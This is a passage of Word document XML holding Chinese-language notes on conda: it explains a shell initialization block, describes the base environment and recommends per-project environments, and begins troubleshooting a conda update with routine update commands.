        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- `else`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `/anaconda/bin/conda shell.bash hook` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令没有成功执行，那么就会执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `else` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后的命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464B4548" w14:textId="77777777" w:rsidR="009912B3" w:rsidRDefault="009912B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- `if [ -f "/anaconda/etc/profile.d/conda.sh" ]; then . "/anaconda/etc/profile.d/conda.sh"`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：这行命令检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `/anaconda/etc/profile.d/conda.sh` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件是否存在。如果存在，那么就会执行（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）这个文件。这个文件一般包含一些设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `conda` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境的命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ADA376" w14:textId="77777777" w:rsidR="009912B3" w:rsidRDefault="009912B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- `else export PATH="/anaconda/bin:$PATH"`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `/anaconda/etc/profile.d/conda.sh` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件不存在，那么就会执行这行命令，将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `/anaconda/bin` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录添加到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `PATH` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境变量中。这样，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">`conda` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令就可以被找到并执行了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3064CA92" w14:textId="77777777" w:rsidR="009912B3" w:rsidRDefault="009912B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- `</w:t>
      </w:r>
      <w:r w:rsidRPr="0055243C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>unset __conda_setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：这行命令清除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `</w:t>
      </w:r>
      <w:r w:rsidRPr="009E7DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>__conda_setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量，以防止它影响到后续的命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BC21AD" w14:textId="77777777" w:rsidR="009912B3" w:rsidRDefault="009912B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E8955F6" w14:textId="3D64AD22" w:rsidR="009912B3" w:rsidRDefault="009912B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总的来说，这段代码的目的就是在启动新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bash shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `conda` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的环境变量，从而使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `conda` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令可以被找到并执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFD57ED" w14:textId="561EEADC" w:rsidR="005837C4" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="247" w:name="_Toc159779707"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="247"/>
    </w:p>
    <w:p w14:paraId="7D2E80E7" w14:textId="77777777" w:rsidR="00DA339B" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境是默认创建的环境，当你安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Anaconda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Miniconda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时就会生成。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境包含了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释器以及一些预安装的包。在安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Anaconda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境还包含了许多常用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NumPy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pandas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C142995" w14:textId="77777777" w:rsidR="00DA339B" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C8C2926" w14:textId="77777777" w:rsidR="00DA339B" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境的特殊之处在于：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18135F90" w14:textId="77777777" w:rsidR="00DA339B" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A45D91A" w14:textId="77777777" w:rsidR="00DA339B" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认激活：当你打开命令行或终端时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境会自动激活。这意味着你可以立即开始使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A6805B" w14:textId="77777777" w:rsidR="00DA339B" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2296E898" w14:textId="77777777" w:rsidR="00DA339B" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自身的环境：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具本身是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境中安装的。因此，在更新或修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，请确保处于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1265D847" w14:textId="77777777" w:rsidR="00DA339B" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6826D317" w14:textId="77777777" w:rsidR="00DA339B" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理其他环境：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境用于创建、管理和删除其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境。尽管你可以在其他环境中安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但推荐在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境中执行这些操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347CF525" w14:textId="77777777" w:rsidR="00DA339B" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D55379" w14:textId="77777777" w:rsidR="00DA339B" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当你创建其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境时，它们不是基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境的。每个新环境都是独立的，只包含指定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本和安装的包。然而，它们都依赖于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具来进行管理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF02A49" w14:textId="77777777" w:rsidR="00DA339B" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="475F7E4A" w14:textId="1A9330DA" w:rsidR="005837C4" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常建议在使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Anaconda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Miniconda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，尽量避免直接在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境中安装和运行项目所需的包。这是因为在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境中安装的包可能会导致依赖关系冲突或版本不兼容的问题。为了保持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境的整洁，最佳实践是为每个项目创建一个单独的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境。这样，你可以为每个项目分别管理依赖关系，避免潜在的冲突。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8EC7FA" w14:textId="77777777" w:rsidR="005837C4" w:rsidRDefault="005837C4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AFA7944" w14:textId="72EC4B9E" w:rsidR="00DA339B" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="248" w:name="_Toc159779708"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:bookmarkEnd w:id="248"/>
    </w:p>
    <w:p w14:paraId="3945AEE4" w14:textId="77777777" w:rsidR="00DA339B" w:rsidRDefault="00DA339B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CA0AAF" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>current_repodata.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来查找依赖关系，但在这种情况下失败了。然后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会尝试使用下一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>repodata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源来解决依赖关系。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F088E3B" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="564518D1" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个问题通常是由于包或版本冲突导致的。以下是一些建议来解决这个问题：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D5EA49" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3089BCA0" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已经更新到最新版本。运行以下命令来更新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F161241" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC71011" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    csharp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC04ED0" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B9C7E78" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00111629">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>conda update -n base -c defaults conda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAC93A4" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D651837" w14:textId="7B9488A4" w:rsidR="00111629" w:rsidRDefault="00111629" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者直接更新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00111629">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>conda update conda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AD8D92" w14:textId="77777777" w:rsidR="00111629" w:rsidRDefault="00111629" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40A8D072" w14:textId="77777777" w:rsidR="007A1107" w:rsidRDefault="007A1107" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>更新你的频道顺序。确保</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>defaults</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
